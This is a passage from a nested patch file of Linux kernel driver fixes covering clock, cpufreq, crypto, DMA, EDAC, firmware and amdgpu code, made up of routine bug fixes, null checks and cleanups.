++	fsleep(rst->reset_map[id].udelay ?: 1); /* use 1 us as default */
++
+ 	rcdev->ops->deassert(rcdev, id);
+ 	return 0;
+ }
+diff --git a/drivers/clk/rockchip/clk-rk3568.c b/drivers/clk/rockchip/clk-rk3568.c
+index f85902e2590c7..2f54f630c8b65 100644
+--- a/drivers/clk/rockchip/clk-rk3568.c
++++ b/drivers/clk/rockchip/clk-rk3568.c
+@@ -81,7 +81,7 @@ static struct rockchip_pll_rate_table rk3568_pll_rates[] = {
+ 	RK3036_PLL_RATE(108000000, 2, 45, 5, 1, 1, 0),
+ 	RK3036_PLL_RATE(100000000, 1, 150, 6, 6, 1, 0),
+ 	RK3036_PLL_RATE(96000000, 1, 96, 6, 4, 1, 0),
+-	RK3036_PLL_RATE(78750000, 1, 96, 6, 4, 1, 0),
++	RK3036_PLL_RATE(78750000, 4, 315, 6, 4, 1, 0),
+ 	RK3036_PLL_RATE(74250000, 2, 99, 4, 4, 1, 0),
+ 	{ /* sentinel */ },
+ };
+diff --git a/drivers/clk/sunxi-ng/ccu_mmc_timing.c b/drivers/clk/sunxi-ng/ccu_mmc_timing.c
+index de33414fc5c28..c6a6ce98ca03a 100644
+--- a/drivers/clk/sunxi-ng/ccu_mmc_timing.c
++++ b/drivers/clk/sunxi-ng/ccu_mmc_timing.c
+@@ -43,7 +43,7 @@ int sunxi_ccu_set_mmc_timing_mode(struct clk *clk, bool new_mode)
+ EXPORT_SYMBOL_GPL(sunxi_ccu_set_mmc_timing_mode);
+ 
+ /**
+- * sunxi_ccu_set_mmc_timing_mode: Get the current MMC clock timing mode
++ * sunxi_ccu_get_mmc_timing_mode: Get the current MMC clock timing mode
+  * @clk: clock to query
+  *
+  * Returns 0 if the clock is in old timing mode, > 0 if it is in
+diff --git a/drivers/cpufreq/amd-pstate-ut.c b/drivers/cpufreq/amd-pstate-ut.c
+index e4a5b4d90f833..b448c8d6a16dd 100644
+--- a/drivers/cpufreq/amd-pstate-ut.c
++++ b/drivers/cpufreq/amd-pstate-ut.c
+@@ -64,27 +64,9 @@ static struct amd_pstate_ut_struct amd_pstate_ut_cases[] = {
+ static bool get_shared_mem(void)
+ {
+ 	bool result = false;
+-	char path[] = "/sys/module/amd_pstate/parameters/shared_mem";
+-	char buf[5] = {0};
+-	struct file *filp = NULL;
+-	loff_t pos = 0;
+-	ssize_t ret;
+-
+-	if (!boot_cpu_has(X86_FEATURE_CPPC)) {
+-		filp = filp_open(path, O_RDONLY, 0);
+-		if (IS_ERR(filp))
+-			pr_err("%s unable to open %s file!\n", __func__, path);
+-		else {
+-			ret = kernel_read(filp, &buf, sizeof(buf), &pos);
+-			if (ret < 0)
+-				pr_err("%s read %s file fail ret=%ld!\n",
+-					__func__, path, (long)ret);
+-			filp_close(filp, NULL);
+-		}
+ 
+-		if ('Y' == *buf)
+-			result = true;
+-	}
++	if (!boot_cpu_has(X86_FEATURE_CPPC))
++		result = true;
+ 
+ 	return result;
+ }
+@@ -158,7 +140,7 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 			if (ret) {
+ 				amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 				pr_err("%s cppc_get_perf_caps ret=%d error!\n", __func__, ret);
+-				return;
++				goto skip_test;
+ 			}
+ 
+ 			nominal_perf = cppc_perf.nominal_perf;
+@@ -169,7 +151,7 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 			if (ret) {
+ 				amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 				pr_err("%s read CPPC_CAP1 ret=%d error!\n", __func__, ret);
+-				return;
++				goto skip_test;
+ 			}
+ 
+ 			nominal_perf = AMD_CPPC_NOMINAL_PERF(cap1);
+@@ -187,7 +169,7 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 				nominal_perf, cpudata->nominal_perf,
+ 				lowest_nonlinear_perf, cpudata->lowest_nonlinear_perf,
+ 				lowest_perf, cpudata->lowest_perf);
+-			return;
++			goto skip_test;
+ 		}
+ 
+ 		if (!((highest_perf >= nominal_perf) &&
+@@ -198,11 +180,15 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 			pr_err("%s cpu%d highest=%d >= nominal=%d > lowest_nonlinear=%d > lowest=%d > 0, the formula is incorrect!\n",
+ 				__func__, cpu, highest_perf, nominal_perf,
+ 				lowest_nonlinear_perf, lowest_perf);
+-			return;
++			goto skip_test;
+ 		}
++		cpufreq_cpu_put(policy);
+ 	}
+ 
+ 	amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_PASS;
++	return;
++skip_test:
++	cpufreq_cpu_put(policy);
+ }
+ 
+ /*
+@@ -230,14 +216,14 @@ static void amd_pstate_ut_check_freq(u32 index)
+ 			pr_err("%s cpu%d max=%d >= nominal=%d > lowest_nonlinear=%d > min=%d > 0, the formula is incorrect!\n",
+ 				__func__, cpu, cpudata->max_freq, cpudata->nominal_freq,
+ 				cpudata->lowest_nonlinear_freq, cpudata->min_freq);
+-			return;
++			goto skip_test;
+ 		}
+ 
+ 		if (cpudata->min_freq != policy->min) {
+ 			amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 			pr_err("%s cpu%d cpudata_min_freq=%d policy_min=%d, they should be equal!\n",
+ 				__func__, cpu, cpudata->min_freq, policy->min);
+-			return;
++			goto skip_test;
+ 		}
+ 
+ 		if (cpudata->boost_supported) {
+@@ -249,16 +235,20 @@ static void amd_pstate_ut_check_freq(u32 index)
+ 				pr_err("%s cpu%d policy_max=%d should be equal cpu_max=%d or cpu_nominal=%d !\n",
+ 					__func__, cpu, policy->max, cpudata->max_freq,
+ 					cpudata->nominal_freq);
+-				return;
++				goto skip_test;
+ 			}
+ 		} else {
+ 			amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 			pr_err("%s cpu%d must support boost!\n", __func__, cpu);
+-			return;
++			goto skip_test;
+ 		}
++		cpufreq_cpu_put(policy);
+ 	}
+ 
+ 	amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_PASS;
++	return;
++skip_test:
++	cpufreq_cpu_put(policy);
+ }
+ 
+ static int __init amd_pstate_ut_init(void)
+diff --git a/drivers/cpufreq/brcmstb-avs-cpufreq.c b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+index 4153150e20db5..f644c5e325fb2 100644
+--- a/drivers/cpufreq/brcmstb-avs-cpufreq.c
++++ b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+@@ -434,7 +434,11 @@ brcm_avs_get_freq_table(struct device *dev, struct private_data *priv)
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	table = devm_kcalloc(dev, AVS_PSTATE_MAX + 1, sizeof(*table),
++	/*
++	 * We allocate space for the 5 different P-STATES AVS,
++	 * plus extra space for a terminating element.
++	 */
++	table = devm_kcalloc(dev, AVS_PSTATE_MAX + 1 + 1, sizeof(*table),
+ 			     GFP_KERNEL);
+ 	if (!table)
+ 		return ERR_PTR(-ENOMEM);
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 285ba51b31f60..c8912756fc06d 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -450,8 +450,10 @@ void cpufreq_freq_transition_end(struct cpufreq_policy *policy,
+ 			    policy->cur,
+ 			    policy->cpuinfo.max_freq);
+ 
++	spin_lock(&policy->transition_lock);
+ 	policy->transition_ongoing = false;
+ 	policy->transition_task = NULL;
++	spin_unlock(&policy->transition_lock);
+ 
+ 	wake_up(&policy->transition_wait);
+ }
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index d51f90f55c05c..fbe3a40987438 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -2574,6 +2574,11 @@ static int intel_pstate_set_policy(struct cpufreq_policy *policy)
+ 			intel_pstate_clear_update_util_hook(policy->cpu);
+ 		intel_pstate_hwp_set(policy->cpu);
+ 	}
++	/*
++	 * policy->cur is never updated with the intel_pstate driver, but it
++	 * is used as a stale frequency value. So, keep it within limits.
++	 */
++	policy->cur = policy->min;
+ 
+ 	mutex_unlock(&intel_pstate_limits_lock);
+ 
+diff --git a/drivers/cpufreq/powernow-k8.c b/drivers/cpufreq/powernow-k8.c
+index d289036beff23..b10f7a1b77f11 100644
+--- a/drivers/cpufreq/powernow-k8.c
++++ b/drivers/cpufreq/powernow-k8.c
+@@ -1101,7 +1101,8 @@ static int powernowk8_cpu_exit(struct cpufreq_policy *pol)
+ 
+ 	kfree(data->powernow_table);
+ 	kfree(data);
+-	for_each_cpu(cpu, pol->cpus)
++	/* pol->cpus will be empty here, use related_cpus instead. */
++	for_each_cpu(cpu, pol->related_cpus)
+ 		per_cpu(powernow_data, cpu) = NULL;
+ 
+ 	return 0;
+diff --git a/drivers/cpuidle/cpuidle-pseries.c b/drivers/cpuidle/cpuidle-pseries.c
+index 7e7ab5597d7ac..0590001db6532 100644
+--- a/drivers/cpuidle/cpuidle-pseries.c
++++ b/drivers/cpuidle/cpuidle-pseries.c
+@@ -410,13 +410,7 @@ static int __init pseries_idle_probe(void)
+ 		return -ENODEV;
+ 
+ 	if (firmware_has_feature(FW_FEATURE_SPLPAR)) {
+-		/*
+-		 * Use local_paca instead of get_lppaca() since
+-		 * preemption is not disabled, and it is not required in
+-		 * fact, since lppaca_ptr does not need to be the value
+-		 * associated to the current CPU, it can be from any CPU.
+-		 */
+-		if (lppaca_shared_proc(local_paca->lppaca_ptr)) {
++		if (lppaca_shared_proc()) {
+ 			cpuidle_state_table = shared_states;
+ 			max_idle_state = ARRAY_SIZE(shared_states);
+ 		} else {
+diff --git a/drivers/crypto/caam/caampkc.c b/drivers/crypto/caam/caampkc.c
+index 8867275767101..51b48b57266a6 100644
+--- a/drivers/crypto/caam/caampkc.c
++++ b/drivers/crypto/caam/caampkc.c
+@@ -223,7 +223,9 @@ static int caam_rsa_count_leading_zeros(struct scatterlist *sgl,
+ 		if (len && *buff)
+ 			break;
+ 
+-		sg_miter_next(&miter);
++		if (!sg_miter_next(&miter))
++			break;
++
+ 		buff = miter.addr;
+ 		len = miter.length;
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_gen4_pm.h b/drivers/crypto/qat/qat_common/adf_gen4_pm.h
+index f8f8a9ee29e5b..db4326933d1c0 100644
+--- a/drivers/crypto/qat/qat_common/adf_gen4_pm.h
++++ b/drivers/crypto/qat/qat_common/adf_gen4_pm.h
+@@ -35,7 +35,7 @@
+ #define ADF_GEN4_PM_MSG_PENDING			BIT(0)
+ #define ADF_GEN4_PM_MSG_PAYLOAD_BIT_MASK	GENMASK(28, 1)
+ 
+-#define ADF_GEN4_PM_DEFAULT_IDLE_FILTER		(0x0)
++#define ADF_GEN4_PM_DEFAULT_IDLE_FILTER		(0x6)
+ #define ADF_GEN4_PM_MAX_IDLE_FILTER		(0x7)
+ 
+ int adf_gen4_enable_pm(struct adf_accel_dev *accel_dev);
+diff --git a/drivers/crypto/stm32/stm32-hash.c b/drivers/crypto/stm32/stm32-hash.c
+index d33006d43f761..4df5330afaa1d 100644
+--- a/drivers/crypto/stm32/stm32-hash.c
++++ b/drivers/crypto/stm32/stm32-hash.c
+@@ -565,9 +565,9 @@ static int stm32_hash_dma_send(struct stm32_hash_dev *hdev)
+ 	}
+ 
+ 	for_each_sg(rctx->sg, tsg, rctx->nents, i) {
++		sg[0] = *tsg;
+ 		len = sg->length;
+ 
+-		sg[0] = *tsg;
+ 		if (sg_is_last(sg)) {
+ 			if (hdev->dma_mode == 1) {
+ 				len = (ALIGN(sg->length, 16) - 16);
+@@ -1566,9 +1566,7 @@ static int stm32_hash_remove(struct platform_device *pdev)
+ 	if (!hdev)
+ 		return -ENODEV;
+ 
+-	ret = pm_runtime_resume_and_get(hdev->dev);
+-	if (ret < 0)
+-		return ret;
++	ret = pm_runtime_get_sync(hdev->dev);
+ 
+ 	stm32_hash_unregister_algs(hdev);
+ 
+@@ -1584,7 +1582,8 @@ static int stm32_hash_remove(struct platform_device *pdev)
+ 	pm_runtime_disable(hdev->dev);
+ 	pm_runtime_put_noidle(hdev->dev);
+ 
+-	clk_disable_unprepare(hdev->clk);
++	if (ret >= 0)
++		clk_disable_unprepare(hdev->clk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index 8c5f6f7fca112..fe6644f998872 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -763,6 +763,7 @@ static void devfreq_dev_release(struct device *dev)
+ 		dev_pm_opp_put_opp_table(devfreq->opp_table);
+ 
+ 	mutex_destroy(&devfreq->lock);
++	srcu_cleanup_notifier_head(&devfreq->transition_notifier_list);
+ 	kfree(devfreq);
+ }
+ 
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index b64ae02c26f8c..81de833ccd041 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -210,6 +210,7 @@ config FSL_DMA
+ config FSL_EDMA
+ 	tristate "Freescale eDMA engine support"
+ 	depends on OF
++	depends on HAS_IOMEM
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+ 	help
+@@ -279,6 +280,7 @@ config IMX_SDMA
+ 
+ config INTEL_IDMA64
+ 	tristate "Intel integrated DMA 64-bit support"
++	depends on HAS_IOMEM
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+ 	help
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 18cd8151dee02..6e1e14b376e65 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -1426,7 +1426,7 @@ static ssize_t pasid_enabled_show(struct device *dev,
+ {
+ 	struct idxd_device *idxd = confdev_to_idxd(dev);
+ 
+-	return sysfs_emit(buf, "%u\n", device_pasid_enabled(idxd));
++	return sysfs_emit(buf, "%u\n", device_user_pasid_enabled(idxd));
+ }
+ static DEVICE_ATTR_RO(pasid_enabled);
+ 
+diff --git a/drivers/dma/ste_dma40.c b/drivers/dma/ste_dma40.c
+index f093e08c23b16..3b09fdc507e04 100644
+--- a/drivers/dma/ste_dma40.c
++++ b/drivers/dma/ste_dma40.c
+@@ -3597,6 +3597,10 @@ static int __init d40_probe(struct platform_device *pdev)
+ 	spin_lock_init(&base->lcla_pool.lock);
+ 
+ 	base->irq = platform_get_irq(pdev, 0);
++	if (base->irq < 0) {
++		ret = base->irq;
++		goto destroy_cache;
++	}
+ 
+ 	ret = request_irq(base->irq, d40_handle_interrupt, 0, D40_NAME, base);
+ 	if (ret) {
+diff --git a/drivers/edac/igen6_edac.c b/drivers/edac/igen6_edac.c
+index a07bbfd075d06..8ec70da8d84fe 100644
+--- a/drivers/edac/igen6_edac.c
++++ b/drivers/edac/igen6_edac.c
+@@ -27,7 +27,7 @@
+ #include "edac_mc.h"
+ #include "edac_module.h"
+ 
+-#define IGEN6_REVISION	"v2.5"
++#define IGEN6_REVISION	"v2.5.1"
+ 
+ #define EDAC_MOD_STR	"igen6_edac"
+ #define IGEN6_NMI_NAME	"igen6_ibecc"
+@@ -1216,9 +1216,6 @@ static int igen6_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	INIT_WORK(&ecclog_work, ecclog_work_cb);
+ 	init_irq_work(&ecclog_irq_work, ecclog_irq_work_cb);
+ 
+-	/* Check if any pending errors before registering the NMI handler */
+-	ecclog_handler();
+-
+ 	rc = register_err_handler();
+ 	if (rc)
+ 		goto fail3;
+@@ -1230,6 +1227,9 @@ static int igen6_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		goto fail4;
+ 	}
+ 
++	/* Check if any pending errors before/during the registration of the error handler */
++	ecclog_handler();
++
+ 	igen6_debug_setup();
+ 	return 0;
+ fail4:
+diff --git a/drivers/extcon/Kconfig b/drivers/extcon/Kconfig
+index 290186e44e6bd..4dd52a6a5b48d 100644
+--- a/drivers/extcon/Kconfig
++++ b/drivers/extcon/Kconfig
+@@ -62,6 +62,7 @@ config EXTCON_INTEL_CHT_WC
+ 	tristate "Intel Cherrytrail Whiskey Cove PMIC extcon driver"
+ 	depends on INTEL_SOC_PMIC_CHTWC
+ 	depends on USB_SUPPORT
++	depends on POWER_SUPPLY
+ 	select USB_ROLE_SWITCH
+ 	help
+ 	  Say Y here to enable extcon support for charger detection / control
+diff --git a/drivers/firmware/arm_sdei.c b/drivers/firmware/arm_sdei.c
+index f9040bd610812..285fe7ad490d1 100644
+--- a/drivers/firmware/arm_sdei.c
++++ b/drivers/firmware/arm_sdei.c
+@@ -1095,3 +1095,22 @@ int sdei_event_handler(struct pt_regs *regs,
+ 	return err;
+ }
+ NOKPROBE_SYMBOL(sdei_event_handler);
++
++void sdei_handler_abort(void)
++{
++	/*
++	 * If the crash happened in an SDEI event handler then we need to
++	 * finish the handler with the firmware so that we can have working
++	 * interrupts in the crash kernel.
++	 */
++	if (__this_cpu_read(sdei_active_critical_event)) {
++	        pr_warn("still in SDEI critical event context, attempting to finish handler.\n");
++	        __sdei_handler_abort();
++	        __this_cpu_write(sdei_active_critical_event, NULL);
++	}
++	if (__this_cpu_read(sdei_active_normal_event)) {
++	        pr_warn("still in SDEI normal event context, attempting to finish handler.\n");
++	        __sdei_handler_abort();
++	        __this_cpu_write(sdei_active_normal_event, NULL);
++	}
++}
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 81cc3d0f6eec1..81c5f94b1be11 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -939,7 +939,8 @@ static int cs_dsp_create_control(struct cs_dsp *dsp,
+ 		    ctl->alg_region.alg == alg_region->alg &&
+ 		    ctl->alg_region.type == alg_region->type) {
+ 			if ((!subname && !ctl->subname) ||
+-			    (subname && !strncmp(ctl->subname, subname, ctl->subname_len))) {
++			    (subname && (ctl->subname_len == subname_len) &&
++			     !strncmp(ctl->subname, subname, ctl->subname_len))) {
+ 				if (!ctl->enabled)
+ 					ctl->enabled = 1;
+ 				return 0;
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 33a7811e12c65..4f0152b11a890 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -61,7 +61,7 @@ preserve_pci_rom_image(efi_pci_io_protocol_t *pci, struct pci_setup_rom **__rom)
+ 	rom->data.type	= SETUP_PCI;
+ 	rom->data.len	= size - sizeof(struct setup_data);
+ 	rom->data.next	= 0;
+-	rom->pcilen	= pci->romsize;
++	rom->pcilen	= romsize;
+ 	*__rom = rom;
+ 
+ 	status = efi_call_proto(pci, pci.read, EfiPciIoWidthUint16,
+diff --git a/drivers/firmware/meson/meson_sm.c b/drivers/firmware/meson/meson_sm.c
+index 77aa5c6398aa6..d081a6312627b 100644
+--- a/drivers/firmware/meson/meson_sm.c
++++ b/drivers/firmware/meson/meson_sm.c
+@@ -292,6 +292,8 @@ static int __init meson_sm_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	chip = of_match_device(meson_sm_ids, dev)->data;
++	if (!chip)
++		return -EINVAL;
+ 
+ 	if (chip->cmd_shmem_in_base) {
+ 		fw->sm_shmem_in_base = meson_sm_map_shmem(chip->cmd_shmem_in_base,
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index 6281e7153b475..4c550cfbc086c 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -97,7 +97,6 @@ struct ti_sci_desc {
+  * @node:	list head
+  * @host_id:	Host ID
+  * @users:	Number of users of this instance
+- * @is_suspending: Flag set to indicate in suspend path.
+  */
+ struct ti_sci_info {
+ 	struct device *dev;
+@@ -116,7 +115,6 @@ struct ti_sci_info {
+ 	u8 host_id;
+ 	/* protected by ti_sci_list_mutex */
+ 	int users;
+-	bool is_suspending;
+ };
+ 
+ #define cl_to_ti_sci_info(c)	container_of(c, struct ti_sci_info, cl)
+@@ -418,14 +416,14 @@ static inline int ti_sci_do_xfer(struct ti_sci_info *info,
+ 
+ 	ret = 0;
+ 
+-	if (!info->is_suspending) {
++	if (system_state <= SYSTEM_RUNNING) {
+ 		/* And we wait for the response. */
+ 		timeout = msecs_to_jiffies(info->desc->max_rx_timeout_ms);
+ 		if (!wait_for_completion_timeout(&xfer->done, timeout))
+ 			ret = -ETIMEDOUT;
+ 	} else {
+ 		/*
+-		 * If we are suspending, we cannot use wait_for_completion_timeout
++		 * If we are !running, we cannot use wait_for_completion_timeout
+ 		 * during noirq phase, so we must manually poll the completion.
+ 		 */
+ 		ret = read_poll_timeout_atomic(try_wait_for_completion, done_state,
+@@ -3282,35 +3280,6 @@ static int tisci_reboot_handler(struct notifier_block *nb, unsigned long mode,
+ 	return NOTIFY_BAD;
+ }
+ 
+-static void ti_sci_set_is_suspending(struct ti_sci_info *info, bool is_suspending)
+-{
+-	info->is_suspending = is_suspending;
+-}
+-
+-static int ti_sci_suspend(struct device *dev)
+-{
+-	struct ti_sci_info *info = dev_get_drvdata(dev);
+-	/*
+-	 * We must switch operation to polled mode now as drivers and the genpd
+-	 * layer may make late TI SCI calls to change clock and device states
+-	 * from the noirq phase of suspend.
+-	 */
+-	ti_sci_set_is_suspending(info, true);
+-
+-	return 0;
+-}
+-
+-static int ti_sci_resume(struct device *dev)
+-{
+-	struct ti_sci_info *info = dev_get_drvdata(dev);
+-
+-	ti_sci_set_is_suspending(info, false);
+-
+-	return 0;
+-}
+-
+-static DEFINE_SIMPLE_DEV_PM_OPS(ti_sci_pm_ops, ti_sci_suspend, ti_sci_resume);
+-
+ /* Description for K2G */
+ static const struct ti_sci_desc ti_sci_pmmc_k2g_desc = {
+ 	.default_host_id = 2,
+@@ -3519,7 +3488,6 @@ static struct platform_driver ti_sci_driver = {
+ 	.driver = {
+ 		   .name = "ti-sci",
+ 		   .of_match_table = of_match_ptr(ti_sci_of_match),
+-		   .pm = &ti_sci_pm_ops,
+ 	},
+ };
+ module_platform_driver(ti_sci_driver);
+diff --git a/drivers/fsi/fsi-master-aspeed.c b/drivers/fsi/fsi-master-aspeed.c
+index 7cec1772820d3..5eccab175e86b 100644
+--- a/drivers/fsi/fsi-master-aspeed.c
++++ b/drivers/fsi/fsi-master-aspeed.c
+@@ -454,6 +454,8 @@ static ssize_t cfam_reset_store(struct device *dev, struct device_attribute *att
+ 	gpiod_set_value(aspeed->cfam_reset_gpio, 1);
+ 	usleep_range(900, 1000);
+ 	gpiod_set_value(aspeed->cfam_reset_gpio, 0);
++	usleep_range(900, 1000);
++	opb_writel(aspeed, ctrl_base + FSI_MRESP0, cpu_to_be32(FSI_MRESP_RST_ALL_MASTER));
+ 	mutex_unlock(&aspeed->lock);
+ 	trace_fsi_master_aspeed_cfam_reset(false);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index e6427a00cf6d6..9aac9e755609d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1212,6 +1212,9 @@ int amdgpu_device_resize_fb_bar(struct amdgpu_device *adev)
+ 	u16 cmd;
+ 	int r;
+ 
++	if (!IS_ENABLED(CONFIG_PHYS_ADDR_T_64BIT))
++		return 0;
++
+ 	/* Bypass for VF */
+ 	if (amdgpu_sriov_vf(adev))
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+index 4e42dcb1950f7..9e3313dd956ae 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+@@ -554,6 +554,7 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 			crtc = (struct drm_crtc *)minfo->crtcs[i];
+ 			if (crtc && crtc->base.id == info->mode_crtc.id) {
+ 				struct amdgpu_crtc *amdgpu_crtc = to_amdgpu_crtc(crtc);
++
+ 				ui32 = amdgpu_crtc->crtc_id;
+ 				found = 1;
+ 				break;
+@@ -572,7 +573,7 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 		if (ret)
+ 			return ret;
+ 
+-		ret = copy_to_user(out, &ip, min((size_t)size, sizeof(ip)));
++		ret = copy_to_user(out, &ip, min_t(size_t, size, sizeof(ip)));
+ 		return ret ? -EFAULT : 0;
+ 	}
+ 	case AMDGPU_INFO_HW_IP_COUNT: {
+@@ -718,17 +719,18 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 				    ? -EFAULT : 0;
+ 	}
+ 	case AMDGPU_INFO_READ_MMR_REG: {
+-		unsigned n, alloc_size;
++		unsigned int n, alloc_size;
+ 		uint32_t *regs;
+-		unsigned se_num = (info->read_mmr_reg.instance >>
++		unsigned int se_num = (info->read_mmr_reg.instance >>
+ 				   AMDGPU_INFO_MMR_SE_INDEX_SHIFT) &
+ 				  AMDGPU_INFO_MMR_SE_INDEX_MASK;
+-		unsigned sh_num = (info->read_mmr_reg.instance >>
++		unsigned int sh_num = (info->read_mmr_reg.instance >>
+ 				   AMDGPU_INFO_MMR_SH_INDEX_SHIFT) &
+ 				  AMDGPU_INFO_MMR_SH_INDEX_MASK;
+ 
+ 		/* set full masks if the userspace set all bits
+-		 * in the bitfields */
++		 * in the bitfields
++		 */
+ 		if (se_num == AMDGPU_INFO_MMR_SE_INDEX_MASK)
+ 			se_num = 0xffffffff;
+ 		else if (se_num >= AMDGPU_GFX_MAX_SE)
+@@ -852,7 +854,7 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 		return ret;
+ 	}
+ 	case AMDGPU_INFO_VCE_CLOCK_TABLE: {
+-		unsigned i;
++		unsigned int i;
+ 		struct drm_amdgpu_info_vce_clock_table vce_clk_table = {};
+ 		struct amd_vce_state *vce_state;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/cik.c b/drivers/gpu/drm/amd/amdgpu/cik.c
+index de6d10390ab2f..9be6da37032a7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/cik.c
++++ b/drivers/gpu/drm/amd/amdgpu/cik.c
+@@ -1574,17 +1574,8 @@ static void cik_pcie_gen3_enable(struct amdgpu_device *adev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(adev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(adev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(adev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE(ixPCIE_LC_STATUS1);
+ 			max_lw = (tmp & PCIE_LC_STATUS1__LC_DETECTED_LINK_WIDTH_MASK) >>
+@@ -1637,21 +1628,14 @@ static void cik_pcie_gen3_enable(struct amdgpu_device *adev)
+ 				msleep(100);
+ 
+ 				/* linkctl */
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root, PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(adev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(adev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(adev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				/* linkctl2 */
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+diff --git a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+index 8c5fa4b7b68a2..c7cb30efe43de 100644
+--- a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+@@ -147,14 +147,15 @@ static int psp_v13_0_wait_for_bootloader(struct psp_context *psp)
+ 	int ret;
+ 	int retry_loop;
+ 
++	/* Wait for bootloader to signify that it is ready having bit 31 of
++	 * C2PMSG_35 set to 1. All other bits are expected to be cleared.
